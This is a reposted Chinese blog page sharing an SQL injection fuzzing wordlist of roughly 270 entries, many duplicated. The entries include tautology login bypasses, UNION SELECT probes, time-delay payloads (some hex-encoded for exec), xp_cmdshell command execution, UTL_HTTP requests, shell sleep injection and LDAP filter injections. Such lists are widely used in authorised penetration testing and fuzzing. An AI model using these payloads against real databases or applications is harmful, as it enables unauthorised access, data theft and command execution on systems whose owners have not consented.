SQL注入Fuzzing字典

x33g5p2x  于2022-04-18 转载在 其他  
字(3.4k)|赞(0)|评价(0)|浏览(534)

需要的自取

  1. '
  2. "
  3. #
  4. -
  5. --
  6. ' --
  7. --';
  8. ' ;
  9. = '
  10. = ;
  11. = --
  12. \x23
  13. \x27
  14. \x3D \x3B'
  15. \x3D \x27
  16. \x27\x4F\x52 SELECT *
  17. \x27\x6F\x72 SELECT *
  18. 'or select *
  19. admin'--
  20. ';shutdown--
  21. <>"'%;)(&+
  22. ' or ''='
  23. ' or 'x'='x
  24. " or "x"="x
  25. ') or ('x'='x
  26. 0 or 1=1
  27. ' or 0=0 --
  28. " or 0=0 --
  29. or 0=0 --
  30. ' or 0=0 #
  31. " or 0=0 #
  32. or 0=0 #
  33. ' or 1=1--
  34. " or 1=1--
  35. ' or '1'='1'--
  36. "' or 1 --'"
  37. or 1=1--
  38. or%201=1
  39. or%201=1 --
  40. ' or 1=1 or ''='
  41. " or 1=1 or ""="
  42. ' or a=a--
  43. " or "a"="a
  44. ') or ('a'='a
  45. ") or ("a"="a
  46. hi" or "a"="a
  47. hi" or 1=1 --
  48. hi' or 1=1 --
  49. hi' or 'a'='a
  50. hi') or ('a'='a
  51. hi") or ("a"="a
  52. 'hi' or 'x'='x';
  53. @variable
  54. ,@variable
  55. PRINT
  56. PRINT @@variable
  57. select
  58. insert
  59. as
  60. or
  61. procedure
  62. limit
  63. order by
  64. asc
  65. desc
  66. delete
  67. update
  68. distinct
  69. having
  70. truncate
  71. replace
  72. like
  73. handler
  74. bfilename
  75. ' or username like '%
  76. ' or uname like '%
  77. ' or userid like '%
  78. ' or uid like '%
  79. ' or user like '%
  80. exec xp
  81. exec sp
  82. '; exec master..xp_cmdshell
  83. '; exec xp_regread
  84. t'exec master..xp_cmdshell 'nslookup www.google.com'--
  85. --sp_password
  86. \x27UNION SELECT
  87. ' UNION SELECT
  88. ' UNION ALL SELECT
  89. ' or (EXISTS)
  90. ' (select top 1
  91. '||UTL_HTTP.REQUEST
  92. 1;SELECT%20*
  93. to_timestamp_tz
  94. tz_offset
  95. &lt;&gt;&quot;'%;)(&amp;+
  96. '%20or%201=1
  97. %27%20or%201=1
  98. %20$(sleep%2050)
  99. %20'sleep%2050'
  100. char%4039%41%2b%40SELECT
  101. &apos;%20OR
  102. 'sqlattempt1
  103. (sqlattempt2)
  104. |
  105. %7C
  106. *|
  107. %2A%7C
  108. *(|(mail=*))
  109. %2A%28%7C%28mail%3D%2A%29%29
  110. *(|(objectclass=*))
  111. %2A%28%7C%28objectclass%3D%2A%29%29
  112. (
  113. %28
  114. )
  115. %29
  116. &
  117. %26
  118. !
  119. %21
  120. ' or 1=1 or ''='
  121. ' or ''='
  122. x' or 1=1 or 'x'='y
  123. /
  124. //
  125. //*
  126. */*
  127. '
  128. ' and '' like '
  129. ' AnD '' like '
  130. ' or '' like '
  131. ' and '' like '%
  132. ' aND '' like '%
  133. ' and '' like ''--
  134. ' and 2>1--
  135. ' and 2>3--
  136. ') and ('x'='x
  137. ) and (1=1
  138. 'or''='
  139. 'or'='or'
  140. a' or 1=1--
  141. "a"" or 1=1--"
  142.  or a = a
  143. a' or 'a' = 'a
  144. 1 or 1=1
  145. a' waitfor delay '0:0:10'--
  146. 1 waitfor delay '0:0:10'--
  147. declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
  148. declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
  149. declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
  150. declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
  151. a'
  152. ?
  153. ' or 1=1
  154. ‘ or 1=1 --
  155. x' AND userid IS NULL; --
  156. x' AND email IS NULL; --
  157. anything' OR 'x'='x
  158. x' AND 1=(SELECT COUNT(*) FROM tabname); --
  159. x' AND members.email IS NULL; --
  160. x' OR full_name LIKE '%Bob%
  161. 23 OR 1=1
  162. '; exec master..xp_cmdshell 'ping 172.10.1.255'--
  163. '
  164. '%20or%20''='
  165. '%20or%20'x'='x
  166. %20or%20x=x
  167. ')%20or%20('x'='x
  168. 0 or 1=1
  169. ' or 0=0 --
  170. " or 0=0 --
  171. or 0=0 --
  172. ' or 0=0 #
  173.  or 0=0 #"
  174. or 0=0 #
  175. ' or 1=1--
  176. " or 1=1--
  177. ' or '1'='1'--
  178. ' or 1 --'
  179. or 1=1--
  180. or%201=1
  181. or%201=1 --
  182. ' or 1=1 or ''='
  183.  or 1=1 or ""=
  184. ' or a=a--
  185.  or a=a
  186. ') or ('a'='a
  187. ) or (a=a
  188. hi or a=a
  189. hi or 1=1 --"
  190. hi' or 1=1 --
  191. hi' or 'a'='a
  192. hi') or ('a'='a
  193. "hi"") or (""a""=""a"
  194. 'hi' or 'x'='x';
  195. @variable
  196. ,@variable
  197. PRINT
  198. PRINT @@variable
  199. select
  200. insert
  201. as
  202. or
  203. procedure
  204. limit
  205. order by
  206. asc
  207. desc
  208. delete
  209. update
  210. distinct
  211. having
  212. truncate
  213. replace
  214. like
  215. handler
  216. bfilename
  217. ' or username like '%
  218. ' or uname like '%
  219. ' or userid like '%
  220. ' or uid like '%
  221. ' or user like '%
  222. exec xp
  223. exec sp
  224. '; exec master..xp_cmdshell
  225. '; exec xp_regread
  226. t'exec master..xp_cmdshell 'nslookup www.google.com'--
  227. --sp_password
  228. \x27UNION SELECT
  229. ' UNION SELECT
  230. ' UNION ALL SELECT
  231. ' or (EXISTS)
  232. ' (select top 1
  233. '||UTL_HTTP.REQUEST
  234. 1;SELECT%20*
  235. to_timestamp_tz
  236. tz_offset
  237. <>"'%;)(&+
  238. '%20or%201=1
  239. %27%20or%201=1
  240. %20$(sleep%2050)
  241. %20'sleep%2050'
  242. char%4039%41%2b%40SELECT
  243. &apos;%20OR
  244. 'sqlattempt1
  245. (sqlattempt2)
  246. |
  247. %7C
  248. *|
  249. %2A%7C
  250. *(|(mail=*))
  251. %2A%28%7C%28mail%3D%2A%29%29
  252. *(|(objectclass=*))
  253. %2A%28%7C%28objectclass%3D%2A%29%29
  254. (
  255. %28
  256. )
  257. %29
  258. &
  259. %26
  260. !
  261. %21
  262. ' or 1=1 or ''='
  263. ' or ''='
  264. x' or 1=1 or 'x'='y
  265. /
  266. //
  267. //*
  268. */*
  269. a' or 3=3--
  270. "a"" or 3=3--"
  271. ' or 3=3
  272. ‘ or 3=3 --

版权说明 : 本文为转载文章, 版权归原作者所有 版权申明

原文链接 : https://blog.csdn.net/weixin_49125123/article/details/124246877

内容来源于网络,如有侵权,请联系作者删除!

安全web安全渗透测试sql注入fuzzing测试绕过

相关文章

    查看更多

    热门标签

    更多
    JavaquerypythonNode开发语言requestUtil数据库Table后端算法LoggerMessageElementParser

    最新文章

    更多
    • 蜀ICP备13028337号-1 大数据知识库 https://www.saoniuhuo.com © All rights reserved
    • 本站内容来源互联网,如果侵犯您的权益请联系我们删除, 联系方式:448109455@qq.com